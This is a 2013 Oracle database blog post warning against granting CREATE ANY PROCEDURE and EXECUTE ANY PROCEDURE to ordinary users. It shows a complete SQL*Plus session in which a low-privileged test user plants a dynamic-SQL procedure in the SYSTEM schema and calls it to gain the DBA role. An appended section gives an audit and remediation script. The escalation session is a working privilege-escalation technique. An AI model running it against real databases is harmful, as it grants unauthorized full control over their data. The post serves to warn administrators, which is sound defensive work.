
Oracle: never grant create any procedure or execute any procedure to ordinary users

Posted on 2013-11-13 22:59 by yn1235

Granting an ordinary user the two privileges create any procedure and execute any procedure is very unsafe.

Once granted, the user can obtain the DBA role with just a few steps: create any procedure lets them create a procedure inside a privileged schema such as SYSTEM, where it runs with that owner's rights, and execute any procedure lets them call it. Please take note.


The test session follows:

SQL> create user hacker identified by bbk;

User created.

SQL> grant create session to hacker;

Grant succeeded.

SQL> grant create any procedure,execute any procedure to hacker;

Grant succeeded.


SQL> conn hacker/bbk
Connected.


SQL> show user
USER is "HACKER"


SQL> select * from session_privs;

PRIVILEGE
----------------------------------------
CREATE SESSION
CREATE ANY PROCEDURE
EXECUTE ANY PROCEDURE


SQL> create procedure system.h1(h1_str in varchar2) as
2 begin
3 execute immediate h1_str;
4 end;
5 /

Procedure created.


SQL> execute system.h1('grant dba to hacker');

PL/SQL procedure successfully completed.


SQL> select * from session_privs;

PRIVILEGE
----------------------------------------
CREATE SESSION
UNLIMITED TABLESPACE
CREATE ANY PROCEDURE
EXECUTE ANY PROCEDURE


SQL> conn hacker/bbk
Connected.


SQL> select * from session_privs;

PRIVILEGE
----------------------------------------
ALTER SYSTEM
AUDIT SYSTEM
CREATE SESSION
ALTER SESSION
RESTRICTED SESSION
CREATE TABLESPACE
ALTER TABLESPACE
MANAGE TABLESPACE
DROP TABLESPACE
UNLIMITED TABLESPACE
CREATE USER

...................................

161 rows selected.


SQL> select * from session_roles;

ROLE
------------------------------
DBA
SELECT_CATALOG_ROLE
HS_ADMIN_ROLE
EXECUTE_CATALOG_ROLE
DELETE_CATALOG_ROLE
EXP_FULL_DATABASE
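A defender's counterpart to the session above, added here as an example and not part of the original post: an Oracle SQL script, run from a DBA session, that finds who holds the privilege pair, lists dynamic-SQL procedures sitting in schemas that hold DBA (the place a procedure like SYSTEM.H1 would be planted), and cleans up the post's test account. It assumes only the standard data dictionary views and traditional (pre-unified) auditing; the account and procedure names are the post's own.

```sql
-- Added audit script (not from the original post). Run as a DBA.
-- Assumes standard dictionary views: DBA_SYS_PRIVS, DBA_ROLE_PRIVS,
-- DBA_USERS, DBA_SOURCE.

-- 1. Who holds CREATE ANY PROCEDURE or EXECUTE ANY PROCEDURE directly?
--    GRANTEE may be a role as well as a user; step 2 resolves roles.
SELECT grantee, privilege, admin_option
  FROM dba_sys_privs
 WHERE privilege IN ('CREATE ANY PROCEDURE', 'EXECUTE ANY PROCEDURE')
 ORDER BY grantee, privilege;

-- 2. Users who receive either privilege through a role (one level deep).
SELECT rp.grantee AS user_name, rp.granted_role, sp.privilege
  FROM dba_role_privs rp
  JOIN dba_sys_privs  sp ON sp.grantee = rp.granted_role
 WHERE sp.privilege IN ('CREATE ANY PROCEDURE', 'EXECUTE ANY PROCEDURE')
   AND rp.grantee IN (SELECT username FROM dba_users)
 ORDER BY rp.grantee, sp.privilege;

-- 3. Stored code in DBA-holding schemas that runs dynamic SQL, which is
--    exactly what SYSTEM.H1 in the post is. Definer's-rights code here
--    executes with the schema owner's privileges, whoever calls it.
--    SYS is excluded as noise; compare it against a baseline separately.
SELECT s.owner, s.name, s.type, s.line, s.text
  FROM dba_source s
 WHERE s.owner IN (SELECT grantee FROM dba_role_privs WHERE granted_role = 'DBA')
   AND s.owner <> 'SYS'
   AND s.type IN ('PROCEDURE', 'FUNCTION', 'PACKAGE BODY')
   AND UPPER(s.text) LIKE '%EXECUTE IMMEDIATE%'
 ORDER BY s.owner, s.name, s.line;

-- 4. Remediation for the post's HACKER account: revoke the dangerous pair,
--    revoke the DBA role it was used to obtain, and drop the planted
--    procedure. Existing sessions keep DBA until they reconnect, so end them.
REVOKE CREATE ANY PROCEDURE, EXECUTE ANY PROCEDURE FROM hacker;
REVOKE DBA FROM hacker;
DROP PROCEDURE system.h1;

-- 5. Log any repeat of the post's sequence: grants/revokes of system
--    privileges and roles, and procedure DDL (traditional auditing syntax).
AUDIT SYSTEM GRANT;
AUDIT PROCEDURE;
```

Step 3 lists every line containing EXECUTE IMMEDIATE, so review hits by object name and CREATED date in DBA_OBJECTS rather than treating each line as a finding.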